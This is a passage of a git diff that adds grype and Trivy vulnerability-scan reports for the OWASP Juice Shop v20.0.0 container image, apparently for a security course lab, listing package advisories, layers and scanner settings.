(semantic)"},"fix":{"suggestedVersion":"7.5.16"}}],"artifact":{"id":"pkg:npm/tar@4.4.19?package-id=f42c59d94c10b95d","name":"tar","version":"4.4.19","type":"npm","locations":[{"path":"/juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:4.4.19:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:4.4.19:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@4.4.19","upstreams":[]}},{"vulnerability":{"id":"GHSA-vmf3-w455-68vh","dataSource":"https://github.com/advisories/GHSA-vmf3-w455-68vh","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh"],"description":"node-tar applies PAX size override to intermediary GNU long-name/long-link headers, causing tar parser interpretation differential (file smuggling)","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N","metrics":{"baseScore":6.9},"vendorMetadata":{}}],"fix":{"versions":["7.5.16"],"state":"fixed","available":[{"version":"7.5.16","date":"2026-06-15","kind":"first-observed"}]},"advisories":[],"risk":0},"relatedVulnerabilities":[{"id":"CVE-2026-53655","dataSource":"nvd","namespace":"nvd:cpe","severity":"Unknown","urls":[],"cvss":[]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"6.2.1"}},"found":{"vulnerabilityID":"GHSA-vmf3-w455-68vh","versionConstraint":"<=7.5.15 (semantic)"},"fix":{"suggestedVersion":"7.5.16"}}],"artifact":{"id":"pkg:npm/tar@6.2.1?package-id=09de397807f7641f","name":"tar","version":"6.2.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/sqlite3/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:tar_project:tar:6.2.1:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:6.2.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@6.2.1","upstreams":[]}},{"vulnerability":{"id":"GHSA-vmf3-w455-68vh","dataSource":"https://github.com/advisories/GHSA-vmf3-w455-68vh","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh"],"description":"node-tar applies PAX size override to intermediary GNU long-name/long-link headers, causing tar parser interpretation differential (file smuggling)","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N","metrics":{"baseScore":6.9},"vendorMetadata":{}}],"fix":{"versions":["7.5.16"],"state":"fixed","available":[{"version":"7.5.16","date":"2026-06-15","kind":"first-observed"}]},"advisories":[],"risk":0},"relatedVulnerabilities":[{"id":"CVE-2026-53655","dataSource":"nvd","namespace":"nvd:cpe","severity":"Unknown","urls":[],"cvss":[]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"tar","version":"7.5.15"}},"found":{"vulnerabilityID":"GHSA-vmf3-w455-68vh","versionConstraint":"<=7.5.15 (semantic)"},"fix":{"suggestedVersion":"7.5.16"}}],"artifact":{"id":"pkg:npm/tar@7.5.15?package-id=c1e644e32c96e7f7","name":"tar","version":"7.5.15","type":"npm","locations":[{"path":"/juice-shop/node_modules/tar/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["BlueOak-1.0.0"],"cpes":["cpe:2.3:a:tar_project:tar:7.5.15:*:*:*:*:node.js:*:*","cpe:2.3:a:isaacs:tar:7.5.15:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/tar@7.5.15","upstreams":[]}}],"alertsByPackage":[{"package":{"id":"pkg:deb/debian/gcc-14@14.2.0-19?distro=debian&package-id=0333b654992e387d","name":"gcc-14","version":"14.2.0-19","type":"deb","locations":[{"path":"/usr/lib/x86_64-linux-gnu/libgomp.so.1.0.0","layerID":"sha256:1f5d28bd51650f429293f7730ede274b81dc0744aa918bc887133c4ad610258c","accessPath":""},{"path":"/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33","layerID":"sha256:6e18ad80f3d64a8cbbcd1ff2e8a0d5ce7282cf664e816b86183a59d30a618e8a","accessPath":""},{"path":"/usr/lib/x86_64-linux-gnu/libgcc_s.so.1","layerID":"sha256:c16b2ec4b1493bad1b1de23d659c899e60abb166bda756d02792f0a03ba54a43","accessPath":""}],"language":"","licenses":[],"cpes":["cpe:2.3:a:gcc-14:gcc-14:14.2.0-19:*:*:*:*:*:*:*","cpe:2.3:a:gcc-14:gcc_14:14.2.0-19:*:*:*:*:*:*:*","cpe:2.3:a:gcc_14:gcc-14:14.2.0-19:*:*:*:*:*:*:*","cpe:2.3:a:gcc_14:gcc_14:14.2.0-19:*:*:*:*:*:*:*","cpe:2.3:a:gcc:gcc-14:14.2.0-19:*:*:*:*:*:*:*","cpe:2.3:a:gcc:gcc_14:14.2.0-19:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/gcc-14@14.2.0-19?distro=debian","upstreams":[]},"alerts":[{"type":"distro-eol","message":"Package is from end-of-life distro: debian ","metadata":{"name":"debian","version":""}}]},{"package":{"id":"pkg:deb/debian/libzstd@1.5.7%2Bdfsg-1?distro=Debian&package-id=81799196ffdbbf0b","name":"libzstd","version":"1.5.7+dfsg-1","type":"deb","locations":[{"path":"/usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7","layerID":"sha256:c0e409312adc366898967307565f692bb33d43a439d3de48e27d14b742389725","accessPath":""}],"language":"","licenses":[],"cpes":["cpe:2.3:a:libzstd:libzstd:1.5.7\\+dfsg-1:*:*:*:*:*:*:*"],"purl":"pkg:deb/Debian/libzstd@1.5.7%2Bdfsg-1?distro=Debian","upstreams":[]},"alerts":[{"type":"distro-eol","message":"Package is from end-of-life distro: ","metadata":{"name":"Debian","version":""}}]}],"source":{"type":"image","target":{"userInput":"bkimminich/juice-shop","imageID":"73ec537d8d158676","manifestDigest":"v20.0.0","mediaType":"","tags":[],"imageSize":0,"layers":null,"manifest":null,"config":null,"repoDigests":[],"architecture":"","os":"","labels":{"maintainer":"Bjoern Kimminich ","org.opencontainers.image.authors":"Bjoern Kimminich ","org.opencontainers.image.created":"”2026-05-12T21:09:09Z”","org.opencontainers.image.description":"Probably the most modern and sophisticated insecure web application","org.opencontainers.image.documentation":"https://help.owasp-juice.shop","org.opencontainers.image.licenses":"MIT","org.opencontainers.image.revision":"f356a09","org.opencontainers.image.source":"https://github.com/juice-shop/juice-shop","org.opencontainers.image.title":"OWASP Juice Shop","org.opencontainers.image.url":"https://owasp-juice.shop","org.opencontainers.image.vendor":"Open Worldwide Application Security Project","org.opencontainers.image.version":"20.0.0"}}},"distro":{"name":"debian","version":"13","idLike":["debian"]},"descriptor":{"name":"grype","version":"0.114.0","configuration":{"output":["json"],"file":"labs/lab4/grype-from-sbom.json","pretty":false,"distro":"","add-cpes-if-none":false,"output-template-file":"","check-for-app-update":true,"only-fixed":false,"only-notfixed":false,"ignore-wontfix":"","platform":"","search":{"scope":"squashed","unindexed-archives":false,"indexed-archives":true},"ignore":[{"vulnerability":"","include-aliases":false,"reason":"","namespace":"","fix-state":"","package":{"name":"kernel-headers","version":"","language":"","type":"rpm","location":"","upstream-name":"kernel"},"vex-status":"","vex-justification":"","match-type":"exact-indirect-match"},{"vulnerability":"","include-aliases":false,"reason":"","namespace":"","fix-state":"","package":{"name":"linux(-.*)?-headers-.*","version":"","language":"","type":"deb","location":"","upstream-name":"linux.*"},"vex-status":"","vex-justification":"","match-type":"exact-indirect-match"},{"vulnerability":"","include-aliases":false,"reason":"","namespace":"","fix-state":"","package":{"name":"linux-libc-dev","version":"","language":"","type":"deb","location":"","upstream-name":"linux"},"vex-status":"","vex-justification":"","match-type":"exact-indirect-match"}],"exclude":[],"externalSources":{"enable":false,"maven":{"searchUpstreamBySha1":true,"baseUrl":"https://search.maven.org/solrsearch/select","rateLimit":300000000}},"match":{"java":{"using-cpes":false},"jvm":{"using-cpes":true},"dotnet":{"using-cpes":false},"golang":{"using-cpes":false,"always-use-cpe-for-stdlib":true,"allow-main-module-pseudo-version-comparison":false},"javascript":{"using-cpes":false},"python":{"using-cpes":false},"ruby":{"using-cpes":false},"rust":{"using-cpes":false},"hex":{"using-cpes":false},"stock":{"using-cpes":true},"dpkg":{"using-cpes":false,"missing-epoch-strategy":"zero","use-cpes-for-eol":false},"rpm":{"using-cpes":false,"missing-epoch-strategy":"auto","use-cpes-for-eol":false}},"fail-on-severity":"","registry":{"insecure-skip-tls-verify":false,"insecure-use-http":false,"ca-cert":""},"show-suppressed":false,"by-cve":false,"SortBy":{"sort-by":"risk"},"name":"","default-image-pull-source":"","from":null,"vex-documents":[],"vex-add":[],"match-upstream-kernel-headers":false,"fix-channel":{"redhat-eus":{"apply":"auto","versions":">= 8.0"}},"timestamp":true,"alerts":{"enable-eol-distro-warnings":true},"db":{"cache-dir":"C:\\Users\\Марат\\AppData\\Local\\cache\\grype\\db","update-url":"https://grype.anchore.io/databases","ca-cert":"","auto-update":true,"validate-by-hash-on-start":true,"validate-age":true,"max-allowed-built-age":432000000000000,"require-update-check":false,"update-available-timeout":30000000000,"update-download-timeout":300000000000,"max-update-check-frequency":7200000000000},"exp":{},"dev":{"db":{"debug":false}}},"db":{"status":{"schemaVersion":"v6.1.7","from":"https://grype.anchore.io/databases/v6/vulnerability-db_v6.1.7_2026-06-17T01:00:18Z_1781683722.tar.zst?checksum=sha256%3Abb73585a33fdc8de285bad6bd0c54f19f0ee8acb73d790001c3b758ecff0f328","built":"2026-06-17T08:08:42Z","path":"C:\\Users\\Марат\\AppData\\Local\\cache\\grype\\db\\6\\vulnerability.db","valid":true},"providers":{"alma":{"captured":"2026-06-17T01:01:17Z","input":"xxh64:a3bd885fa6d084ec"},"alpine":{"captured":"2026-06-17T01:00:18Z","input":"xxh64:d7326dd25f137614"},"amazon":{"captured":"2026-06-17T01:01:12Z","input":"xxh64:cfcdb2aa4b63170b"},"arch":{"captured":"2026-06-17T01:01:11Z","input":"xxh64:8b1f44f3a2291fe7"},"bitnami":{"captured":"2026-06-17T01:01:02Z","input":"xxh64:dff7f437e746da99"},"chainguard":{"captured":"2026-06-17T01:01:25Z","input":"xxh64:396186a2139d337a"},"chainguard-libraries":{"captured":"2026-06-17T01:00:39Z","input":"xxh64:dec1997d9081af70"},"debian":{"captured":"2026-06-17T01:01:30Z","input":"xxh64:7398752ba6acf740"},"echo":{"captured":"2026-06-17T01:00:23Z","input":"xxh64:a61c36d74108acf4"},"eol":{"captured":"2026-06-17T01:00:37Z","input":"xxh64:d47bee3d4f6f37b7"},"epss":{"captured":"2026-06-17T01:01:27Z","input":"xxh64:6de7a820a06a5201"},"fedora":{"captured":"2026-06-17T01:00:35Z","input":"xxh64:88826c9ed8e76a77"},"github":{"captured":"2026-06-17T01:01:06Z","input":"xxh64:5f8adb4485ca004c"},"govulndb":{"captured":"2026-06-17T01:01:21Z","input":"xxh64:d334470751c9c3ec"},"hummingbird":{"captured":"2026-06-17T01:01:04Z","input":"xxh64:4c259f9fa3e14056"},"kev":{"captured":"2026-06-17T01:00:59Z","input":"xxh64:ce814c97dc313f25"},"mariner":{"captured":"2026-06-17T01:00:43Z","input":"xxh64:f798b42d7c78474e"},"minimos":{"captured":"2026-06-17T01:01:13Z","input":"xxh64:5d009cd1e0402eb4"},"nvd":{"captured":"2026-06-17T01:01:18Z","input":"xxh64:e4d90858667caa1d"},"oracle":{"captured":"2026-06-17T01:00:41Z","input":"xxh64:7a0ee66a8a0e85d0"},"photon":{"captured":"2026-06-17T01:00:59Z","input":"xxh64:6a6c72ec77b69ff8"},"rhel":{"captured":"2026-06-17T01:01:28Z","input":"xxh64:36e9ae8f778254ce"},"secureos":{"captured":"2026-06-17T01:01:04Z","input":"xxh64:378867b15ceafa18"},"sles":{"captured":"2026-06-17T01:00:43Z","input":"xxh64:f0a5c92bc64af631"},"ubuntu":{"captured":"2026-06-17T01:03:48Z","input":"xxh64:6b556d0399e187bb"},"wolfi":{"captured":"2026-06-17T01:01:10Z","input":"xxh64:fbb6ee545e24f7d2"}}},"timestamp":"2026-06-17T22:00:17.9642347+03:00"}} diff --git a/labs/lab4/grype-from-sbom.txt b/labs/lab4/grype-from-sbom.txt new file mode 100644 index 0000000000000000000000000000000000000000..ccd84d6528165a49b8b23047111efdc2db13bbaf GIT binary patch literal 29998 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
q0QH^_BC7^%xF68=9DULl2!$$ph{?ml#} zzA2&x#^|!HJ4dK&VZGM+*<+DJ3W3xyAD#TnUYkBRJA9UMCQjya{?im~S~(Rl~G!_{!P(%}b4v;F^NRThYB?3!2JMY3+d z7tY7x{4B0*%4q!_(q<$p=I^AWCw0tyX3;xbbNVAN3a@nUo-b>CFpp7<2i^0kWvLTq zPE7A`^?$CrBda$pv}E0A?JT~}Q=`*teur7iDt6oxmMpII#kEs73!Nh{I0l33J!~Gy hoTm7ZI_9>m`TWk8jE=QDZk+7m9V^?Khr%5)<7eG*j<5g# literal 0 HcmV?d00001 diff --git a/labs/lab4/trivy.json b/labs/lab4/trivy.json new file mode 100644 index 000000000..0a0073e8b --- /dev/null +++ b/labs/lab4/trivy.json @@ -0,0 +1,25658 @@ +{ + "SchemaVersion": 2, + "Trivy": { + "Version": "0.71.1" + }, + "ReportID": "019ed703-4acd-7dfc-97d1-eeb6bb587051", + "CreatedAt": "2026-06-17T22:16:17.7419165+03:00", + "ArtifactID": "sha256:1132dcbbfd294a71e5ebb1cad6f45f24a32a1d04c8e2d6c0c9823fd64ccbaf42", + "ArtifactName": "bkimminich/juice-shop:v20.0.0", + "ArtifactType": "container_image", + "Metadata": { + "Size": 383609856, + "OS": { + "Family": "debian", + "Name": "13.4" + }, + "ImageID": "sha256:fd58bdc9745416afce8184ee0666278a436574633ea7880365153a63bfd418b0", + "DiffIDs": [ + "sha256:82c60ccaf916322916d16bcdb4223f93acc1f68e2087dba4ddf64990b1dc27fb", + "sha256:621c35e751a51a9a9dc3e80aa0b7fe8be2a93402ea6ccd307d30852cd7776cda", + "sha256:ac2a91ec876dfaf2145e14b0b43ce6b3ea3d4edb28a0df9d91c52f2efbb8e1a7", + "sha256:f15316efa9979a44eee43172e640630f60407180eff3d985274befd600bb227d", + "sha256:275a30dd8ce958b21daa9ad962c6fbc09f98306ee2f486b65c9075dc257b1412", + "sha256:4d049f83d9cf21d1f5cc0e11deaf36df02790d0e60c1a3829538fb4b61685368", + "sha256:af5aa97ebe6ce1604747ec1e21af7136ded391bcabe4acef882e718a87c86bcc", + "sha256:6f1cdceb6a3146f0ccb986521156bef8a422cdbb0863396f7f751f575ba308f4", + "sha256:bd3cdfae1d3fdd83a2231d608969b38b82349777c2fff9a7c12d54f8ac5c9b38", + "sha256:4cde6b0bb6f50a5f255eef7b2a42162c661cf776b803225dcac9a659e396bb6b", + "sha256:ad51d0769d16ba578106a177987dfe3d2e02c1668c852b795b2f6b024068242a", + "sha256:187cfc6d1e3e8a40a5e64653bcd3239c140807dcf1c09e48021178705a5a6139", + "sha256:5fd2536c39c0700be8b7b4344e375196da2f126842fd8ede66996a18860a3890", + "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1", + "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7", + "sha256:c0e409312adc366898967307565f692bb33d43a439d3de48e27d14b742389725", + "sha256:e4ba966d7f0527dfe0fcb559e4e18d4da42c4e6beae924719255e0dedb554ed0", + "sha256:1f5d28bd51650f429293f7730ede274b81dc0744aa918bc887133c4ad610258c", + "sha256:6e18ad80f3d64a8cbbcd1ff2e8a0d5ce7282cf664e816b86183a59d30a618e8a", + "sha256:c16b2ec4b1493bad1b1de23d659c899e60abb166bda756d02792f0a03ba54a43", + "sha256:7db505d90756626f425c6c5468eca565c82f589b144ecaa4f411ad9bbf79e614", + "sha256:4132b571d763a067f04f6b40386fc72b4e315885abd5ef369b8156cef6cd57bd", + "sha256:07a1a08836845627bd5c8fe5288e0b9109ee181fbed897af7f5ae490f4606401", + "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + ], + "RepoTags": [ + "bkimminich/juice-shop:v20.0.0" + ], + "RepoDigests": [ + "bkimminich/juice-shop@sha256:fd58bdc9745416afce8184ee0666278a436574633ea7880365153a63bfd418b0" + ], + "Reference": "bkimminich/juice-shop:v20.0.0", + "ImageConfig": { + "architecture": "amd64", + "created": "2026-05-12T21:12:46.590326867Z", + "history": [ + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//base-files/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//netbase/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//tzdata/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//tzdata-legacy/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//media-types/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build //common:rootfs" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build //common:passwd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build //common:home" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build //common:group" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build //common:tmp" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build //static:nsswitch" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build //common:os_release_debian13" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build //common:cacerts_debian13_amd64" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//libc6/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//libssl3t64/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//libzstd1/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//zlib1g/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//libgomp1/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//libstdc++6/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//libgcc-s1/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @trixie//gcc-14-base/amd64:data_statusd" + }, + { + "created": "1970-01-01T00:00:00Z", + "created_by": "bazel build @nodejs24_amd64//:data" + }, + { + "created": "2026-05-12T21:09:17Z", + "created_by": "ARG BUILD_DATE=”2026-05-12T21:09:09Z”", + "comment": "buildkit.dockerfile.v0", + "empty_layer": true + }, + { + "created": "2026-05-12T21:09:17Z", + "created_by": "ARG VCS_REF=f356a09", + "comment": "buildkit.dockerfile.v0", + "empty_layer": true + }, + { + "created": "2026-05-12T21:09:17Z", + "created_by": "LABEL maintainer=Bjoern Kimminich \u003cbjoern.kimminich@owasp.org\u003e org.opencontainers.image.title=OWASP Juice Shop org.opencontainers.image.description=Probably the most modern and sophisticated insecure web application org.opencontainers.image.authors=Bjoern Kimminich \u003cbjoern.kimminich@owasp.org\u003e org.opencontainers.image.vendor=Open Worldwide Application Security Project org.opencontainers.image.documentation=https://help.owasp-juice.shop org.opencontainers.image.licenses=MIT org.opencontainers.image.version=20.0.0 org.opencontainers.image.url=https://owasp-juice.shop org.opencontainers.image.source=https://github.com/juice-shop/juice-shop org.opencontainers.image.revision=f356a09 org.opencontainers.image.created=”2026-05-12T21:09:09Z”", + "comment": "buildkit.dockerfile.v0", + "empty_layer": true + }, + { + "created": "2026-05-12T21:09:17Z", + "created_by": "WORKDIR /juice-shop", + "comment": "buildkit.dockerfile.v0" + }, + { + "created": "2026-05-12T21:12:46Z", + "created_by": "COPY --chown=65532:0 /juice-shop . # buildkit", + "comment": "buildkit.dockerfile.v0" + }, + { + "created": "2026-05-12T21:12:46Z", + "created_by": "USER 65532", + "comment": "buildkit.dockerfile.v0", + "empty_layer": true + }, + { + "created": "2026-05-12T21:12:46Z", + "created_by": "EXPOSE [3000/tcp]", + "comment": "buildkit.dockerfile.v0", + "empty_layer": true + }, + { + "created": "2026-05-12T21:12:46Z", + "created_by": "CMD [\"/juice-shop/build/app.js\"]", + "comment": "buildkit.dockerfile.v0", + "empty_layer": true + } + ], + "os": "linux", + "rootfs": { + "type": "layers", + "diff_ids": [ + "sha256:82c60ccaf916322916d16bcdb4223f93acc1f68e2087dba4ddf64990b1dc27fb", + "sha256:621c35e751a51a9a9dc3e80aa0b7fe8be2a93402ea6ccd307d30852cd7776cda", + "sha256:ac2a91ec876dfaf2145e14b0b43ce6b3ea3d4edb28a0df9d91c52f2efbb8e1a7", + "sha256:f15316efa9979a44eee43172e640630f60407180eff3d985274befd600bb227d", + "sha256:275a30dd8ce958b21daa9ad962c6fbc09f98306ee2f486b65c9075dc257b1412", + "sha256:4d049f83d9cf21d1f5cc0e11deaf36df02790d0e60c1a3829538fb4b61685368", + "sha256:af5aa97ebe6ce1604747ec1e21af7136ded391bcabe4acef882e718a87c86bcc", + "sha256:6f1cdceb6a3146f0ccb986521156bef8a422cdbb0863396f7f751f575ba308f4", + "sha256:bd3cdfae1d3fdd83a2231d608969b38b82349777c2fff9a7c12d54f8ac5c9b38", + "sha256:4cde6b0bb6f50a5f255eef7b2a42162c661cf776b803225dcac9a659e396bb6b", + "sha256:ad51d0769d16ba578106a177987dfe3d2e02c1668c852b795b2f6b024068242a", + "sha256:187cfc6d1e3e8a40a5e64653bcd3239c140807dcf1c09e48021178705a5a6139", + "sha256:5fd2536c39c0700be8b7b4344e375196da2f126842fd8ede66996a18860a3890", + "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1", + "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7", + "sha256:c0e409312adc366898967307565f692bb33d43a439d3de48e27d14b742389725", + "sha256:e4ba966d7f0527dfe0fcb559e4e18d4da42c4e6beae924719255e0dedb554ed0", + "sha256:1f5d28bd51650f429293f7730ede274b81dc0744aa918bc887133c4ad610258c", + "sha256:6e18ad80f3d64a8cbbcd1ff2e8a0d5ce7282cf664e816b86183a59d30a618e8a", + "sha256:c16b2ec4b1493bad1b1de23d659c899e60abb166bda756d02792f0a03ba54a43", + "sha256:7db505d90756626f425c6c5468eca565c82f589b144ecaa4f411ad9bbf79e614", + "sha256:4132b571d763a067f04f6b40386fc72b4e315885abd5ef369b8156cef6cd57bd", + "sha256:07a1a08836845627bd5c8fe5288e0b9109ee181fbed897af7f5ae490f4606401", + "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + ] + }, + "config": { + "Cmd": [ + "/juice-shop/build/app.js" + ], + "Entrypoint": [ + "/nodejs/bin/node" + ], + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "SSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crt" + ], + "Labels": { + "maintainer": "Bjoern Kimminich \u003cbjoern.kimminich@owasp.org\u003e", + "org.opencontainers.image.authors": "Bjoern Kimminich \u003cbjoern.kimminich@owasp.org\u003e", + "org.opencontainers.image.created": "”2026-05-12T21:09:09Z”", + "org.opencontainers.image.description": "Probably the most modern and sophisticated insecure web application", + "org.opencontainers.image.documentation": "https://help.owasp-juice.shop", + "org.opencontainers.image.licenses": "MIT", + "org.opencontainers.image.revision": "f356a09", + "org.opencontainers.image.source": 